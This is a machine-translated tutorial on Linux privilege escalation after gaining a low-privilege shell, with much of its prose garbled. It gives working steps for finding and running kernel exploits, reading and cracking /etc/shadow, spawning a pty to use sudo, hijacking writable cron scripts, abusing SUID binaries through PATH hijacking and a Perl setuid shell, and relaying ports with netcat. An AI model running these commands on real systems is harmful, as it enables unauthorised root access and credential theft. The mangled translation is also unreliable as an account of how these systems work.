Linux rights: From getting started to giving up

The day station is going to be a complete day. Often we can take the server Web services, but is updated than the Western reporters also faster than the administrator of the intranet infiltration of the seeds in the bud of the right to kill. The process of extracting power from Linux system involves not only the loopholes but also many system configurations. Here are some of the ways I have summed up the right.

A few prerequisites

Already got the low-power shell.

The hacked machine has a very common tool like Nc,python,perl and Linux.

have permission to upload files and download files

Kernel exploit rights

Referring to the dirty cattle, operation of the two lines of tears, we left two lines of nosebleed. The kernel flaw is the right-to-power approach that we almost first thought of. The kernel vulnerabilities of the kill are very rare, so we should first collect the information about the system.

View the release version

/etc/issuecat /etc/*-release

View Kernel version

-a

Here I found a machine test:

#uname -aLinux xxxxx 2.6.32-21-generic-pae #32-Ubuntu SMP Fri Apr 16 09:39:35 UTC 2010 i686 GNU/Linux#cat /etc/*-releaseDISTRIB_ID=UbuntuDISTRIB_RELEASE=10.04DISTRIB_CODENAME=lucidDISTRIB_DESCRIPTION="Ubuntu 10.04 LTS"

In this way, we get the kernel version of the system (2.6.32-21 PAE), CPU Architecture (i686), and the release version (Ubuntu 10.04)

You can start searching.

Most kernel vulnerabilities can be traced quickly through the kernel version

Use Kali's own searchsploit to search for exploit code in EXPLOITDB

searchspoit linux 2.6 ubuntu priv esc

Results:

So much, we're adding system information to narrow the range

searchsploit linux priv esc 2.6 ubuntu 10

This optional exp is much less, very helpless, we need a long point to open exp to see the specific requirements of the screening process, most of exp will write the effective conditions. So we can be very angry, but also quickly remove some of the non-use conditions of exp. For example, the third exp is for a special disk format, excluding.

After the difficult search, found 15704,c very pleasing to the eye, so the source code upload, and then:

#gcc exp.c#lsexp.ca.out#./a.outiduid=0(root) gid=0(root)

Let's compile exp and execute it first. You can see that exp does not output after the execution, but we have actually got Rootshell (exp execution must knock a command, otherwise do not know whether it is a success or card)

Exploitdb's search process is cumbersome, but the basic guarantee is not to miss the loopholes. If you want to get lazy first, we can try https://www.kernel-exploits.com/, where exp has been sorted by kernel version, and many have already been compiled.

For example, we search for 2.6.32:

This binary of RDS happens to work. "I collected the information, I uploaded exp, I was root." “

Of course, the above is only a very ideal situation, we often encounter no gcc of the pit Daddy server. At this point we need to compile locally. Local compilation is not only to see the exp source Comment compilation parameters, but also need to manually adjust the compilation parameters, such as to the GCC plus-m 32来 compiled 32-bit. Compile a wide range of problems, have difficulty looking for Google, no longer repeat.

When the kernel version does not have a good exp counterpart, you can check the disk format:

/etc/fstab

And the programs that have been installed:

-lrpm -qa

And then do a tedious search, and maybe you'll find a bug.

Finally, several points of attention to exploit kernel vulnerabilities are highlighted:

1. Read the source code, or it may not even compile

2. Read the source code, or the effort to compile the completion of the discovery does not apply

3. Read the source code, or encounter a delete the whole "exp" How to do

PlainText root password right passwd and shadow

Although the probability of encountering is very small, but still mention

Passwords for most Linux systems are closely related to both/etc/passwd and/etc/shadow profiles. passwd inside stores the user, shadow inside is the password hash. For security reasons, passwd is full-user readable and root writable. Shadow is read-only by Root.

Here is a typical passwd file

RootX:0:0: Root:/root:/bin/bashDaemonX:1:1:d Aemon:/usr/sbin:/bin/shBinX:2:2: Bin:/bin:/bin/shSysX:3:3: sys:/dev:/bin/shSyncX:4:65534: Sync:/bin:/bin/syncGamesX:5:60: Games:/usr/games:/bin/shManX:6:12: Mans:/var/cache/man:/bin/shLp:X:7:7: LP:/VAR/SPOOL/LPD:/bin/shMailX:8:8: Mail:/var/mail:/bin/shNewsX:9:9: News:/var/spool/news:/bin/shUucpX:10:10: UUCP:/VAR/SPOOL/UUCP:/bin/shProxyX:13:13:p Roxy:/bin:/bin/shwww-DataX:33:33: Www-data:/var/www:/bin/shBackupX:34:34: Backup:/var/backups:/bin/shListX:38:38: Mailing Listmanager:/var/List:/bin/shIrc:X:39:39: IRCd:/VAR/RUN/IRCD:/bin/shNobodyX:65534:65534: Nobody:/nonexistent:/bin/shibuuid:x: 100:101 ::/var/lib/libuuid:/bin/shsyslog:x:101 : 103::/home/syslog:/bin/falsesshd:x: 104:65534: :/var/run/sshd:/usr/sbin/nologin       

PASSWD is separated by a colon, the first column is the user name, the second column is the password, and x means that the password hash is placed inside the shadow (so the non-root is not visible). And the most important thing in shadow is the hash of the cipher.

root:$6$urgq7sjf$4X8E9NTQTWAPIUBI9YLXLQ2MZTTZKNGZ0G/WWZODPB5EGUZ.S5IRTFDVFFD9VIVEWOUIODB/HH9BYOLGAD8U5/:16902:0:99999:7:::daemon:*:15730:0:99999:7:::bin:*:15730:0:99999:7:::sys:*:15730:0:99999:7:::sync:*:15730:0:99999:7:::games:*:15730:0:99999:7:::man:*:15730:0:99999:7:::lp:*:15730:0:99999:7:::mail:*:15730:0:99999:7:::news:*:15730:0:99999:7:::uucp:*:15730:0:99999:7:::proxy:*:15730:0:99999:7:::www-data:*:15730:0:99999:7:::backup:*:15730:0:99999:7:::list:*:15730:0:99999:7:::irc:*:15730:0:99999:7:::gnats:*:15730:0:99999:7:::nobody:*:15730:0:99999:7:::libuuid:!:15730:0:99999:7:::syslog:*:15730:0:99999:7:::mysql:! : 15730:0: 99999: 7:::dovecot:*:15730:0:99999:7:::sshd:*: 15730:0: 99999: 7:::postfix:*:15730:0:99999:7:::      

Shell command to check permissions

cd /etcls -l passwd shadow

If passwd is writable, we can replace the root password field (x) with a hash of a known password (such as the root password hash in the native shadow), so that the system validates the password with the passwd, and the password is already identified. If Shadow is readable, we can read the root hash and then use Hashcat or John Brute force to hack it.

Password re-use

Many administrators re-use passwords, so the password for the database or Web backend may be the root password.

And then?

What if I have a root password (suspected)? You must want SSH login. However, SSH is likely to disable root login or firewall rules to exclude you. Back to think, don't we have a low-power shell? Find a way to "enter" the password on the above. Obviously, using sudo directly inside a low-power shell is not working. This is because for security reasons, Linux requires that the user must enter a password from the end device (TTY) instead of the standard input (stdin). In other words, sudo essentially reads the keyboard when you enter the password, rather than the characters entered in bash. So in order to be able to enter a password, we have to simulate an end device. Python has such a feature. Inside the shell, type:

python -c ‘import pty;pty.spawn("/bin/sh")‘

Just use Python to resume a virtual terminal, then you can use sudo and so on commands.

‘import pty;pty.spawn("/bin/sh")‘$ sudo susudo su[sudo] password for www-data: 123456Sorry, try again.[sudo] password for www-data:

Scheduled Tasks

There may be some scheduled tasks in the system, typically these tasks are managed by Crontab and have the permissions of the owning user. Non-root users are not allowed to list the root user's scheduled tasks. But the scheduled tasks of the/etc/system can be listed

-l /etc/cron*

By default, these programs are executed with root privileges, and if you are lucky enough to meet an administrator who has the script configured as any user writable, we can modify the script and so on back to the Rootshell.

SUID

Suid is a special file property that allows a user to execute a file that runs as the owner of the file. For example, the passwd command, which is run with root permission, modifies the shadow.

Here we do an experiment (environment for Ubuntu 16.04):

C Source Code

#include<stdlib.h>#include <unistd.h> int main() {setuid(0);//run as rootsystem("id");system("cat /etc/shadow");}

Compile and set permissions with root

gcc suid.c  -o suid-expchmod 4755 ./suid-exp#这里设置了SUID位ls -l

Output

1 root root 8632 Mar 15 20:53 suid-exp

Note the S property, which indicates that the program has suid properties.

Next we switch users and execute

su test./suid-exp

You can see that the program has actually been elevated to root.

SUID programs often have the right to exploit loopholes, such as Nmap has appeared in the right loopholes. Low-weighted users execute arbitrary system commands with root by opening Nmap interactive mode. In addition to the use of the program function to raise power, we can also try to hijack the environment variable power. The C program above uses the system function, which is the inheritance of environment variables, so we can achieve the effect of executing arbitrary commands by replacing environment variables.

We entered the shell of the test low-power User

cat >> /tmp/cat <<EOF#!/usr/bin/pythonprint "this is not the true cat"print "here is a root shell!"import pty;pty.spawn("/bin/sh")EOF# 这里我们在/tmp建立了假的cat，它会用python执行一个shellPATH=/tmp:$PATH#设置PATH，优先从/tmp查找程序./suid-exp#执行suid程序，因为PATH被劫持，system("cat /etc/shadow");会执行我们的假cat

Run results

Another situation: Administrator configuration error, setuid (0) without the code, the program configured SUID. When these programs are hijacked, we need to use SETUID (0) in our own program; Laiti to Root. Here's a little tip, we use Perl scripts to setuid:

#!/usr/bin/perl$< = $>;$( = $) = 0;system ("/bin/sh"):

With this simple script hijacking, the shell is run under root authority.

Network and Hidden Services

Some server services are configured to be internal or open to the local computer. By attacking them we have access to more sensitive files, or lucky enough to encounter a remote root vulnerability.

netstat -antup#查看各种网络服务

If you find some mysterious service, you can use Netcat to do a forwarding.

-l 8082 0<backpipe | nc remote_host 445 1>backpipe

After looking for loopholes, attacks, from the beginning again.

Related tools

The use of the configuration error, but did not say how to find these errors

Share Two scripts:

Unix-privesc-check:http://pentestmonkey.net/tools/audit/unix-privesc-check

linuxprivchecker:https://www.securitysift.com/download/linuxprivchecker.py

These two programs examine a lot of configuration issues in more detail and make it even more touching to list all the writable files. Basically, their checks are comprehensive enough.

Of course, if you want to manually check or recommend https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/

Summarize

Linux has a lot of power to raise, and it involves a variety of techniques. When writing this article always want to explain the relevant knowledge, but the face of the system tedious work process and a lot of distributions deeply understand their shallow. I'm very much in favor of the idea of a Linux claim on many forums: you need to know how the Linux system works. All kinds of artifice, or the error of the brain, eventually return to the system's operating procedures and authority management mechanism above. A systematic understanding of the system is the best way to ensure security.

Linux rights: From getting started to giving up